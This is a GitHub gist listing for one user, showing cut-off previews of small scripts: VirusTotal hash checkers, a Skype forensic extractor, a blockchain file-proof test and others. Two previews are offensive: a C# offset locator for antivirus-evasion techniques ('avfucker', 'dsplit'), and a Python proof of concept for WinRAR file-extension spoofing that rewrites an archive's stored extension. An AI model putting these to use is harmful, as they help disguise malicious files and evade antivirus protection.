Skip to content

Instantly share code, notes, and snippets.

@sankosk
sankosk / testcase.py
Created May 18, 2016 23:28
Little testing implementation for proof the existence of a file using blockchain technology, my own testing implementation based on stampery.co, [IM WAITING YET FOR THE FCKING API KEYDWAMKDWNKOWDANKOODAWJKWDA]
"""
@Author: Sanko
"""
import urllib, json, hashlib, sys
class Api:
"""
@sankosk
sankosk / OffsetLocatorApp.cs
Created May 16, 2016 14:44
A quick improvised offset locator for doing avfucker and dsplit modding techniques
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
namespace OffsetLocator
@sankosk
sankosk / SpacecraftRadar.java
Created November 24, 2014 22:03
Radar that detect spacecrafts from the enemy
/**
* SpacecraftRadar its a radar to detect spacecrafts from the enemy
*
* @author (Esteban Montes)
* @version (a version number or a date)
* @exercise statement: http://i.imgur.com/fkM15vm.png
*/
public class SpacecraftRadar
{
public static final int SPACEMAP_DIM = 10; //10x10
@sankosk
sankosk / vt_process.py
Created September 17, 2014 22:11
Virustotal hash process checker [Windows]
# -*- coding: utf-8 *-*
#It's a simple script to search the hash of the active processes in VirusTotal
#and check if your active processes are uploaded in VT or not
#Sanko
import urllib, urllib2, hashlib, sys, wmi
import simplejson as json
class VT_Process_Checker():
@sankosk
sankosk / vt_hash_chk.py
Created September 17, 2014 22:10
Virustotal hash checker
# -*- coding: utf-8 *-*
#It's a simple script to search the hash of the file in VirusTotal
#and check if your file has been uploaded to VT
#Sanko
import urllib, urllib2, hashlib, sys
import simplejson as json
class VT_File_Checker():
@sankosk
sankosk / skype.py
Created September 17, 2014 22:08
skype main.db info extractor [forensic]
# -*- coding: utf-8 *-*
import sqlite3
class Skype_Meta_Extractor():
def __init__(self, DBPath):
self.DBPath = DBPath
def __manager():
try:
@sankosk
sankosk / viewuds.py
Created September 17, 2014 21:51
ver unidades presentes [windows]
import ctypes
def cUnidades():
if ctypes.windll.kernel32.GetLogicalDrives():
print ", ".join([chr(x) + u":\\" for x in range(65, 95) if (ctypes.windll.kernel32.GetDriveTypeW(chr(x) + u":\\")==2) ])
@sankosk
sankosk / poc.py
Created September 17, 2014 21:50
WInrar file spoofing PoC
"""
PoC of http://thehackernews.com/2014/04/winrar-file-extension-spoofing.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29
"""
def spread(sFile, orgExt, newExt):
f = open(sFile, 'r')
content = f.read()
f.close()
f = open('exploited_%s' % sFile, 'w')
f.write(content[0:len(content)-1000] + content[(len(content)-1000)::].replace(orgExt, newExt))
@sankosk
sankosk / coderwall.py
Created September 17, 2014 21:48
SImple coderwall api
import urllib, json
class Coderwall:
def __init__(self, username, data=""):
self.username = username
self.url = "http://coderwall.com/"
self.parseData(data)
@sankosk
sankosk / fuckingme.py
Created September 17, 2014 21:46
Simple fucking scanner scanner
import pycurl, urllib, cStringIO, pool
from base64 import b64decode
class FuckingScan:
def adfly(self, ysmm):
self.ysmm = ysmm
x = ''
y = ''
for c in [ysmm[i:i+2] for i in range(0, len(ysmm), 2)]: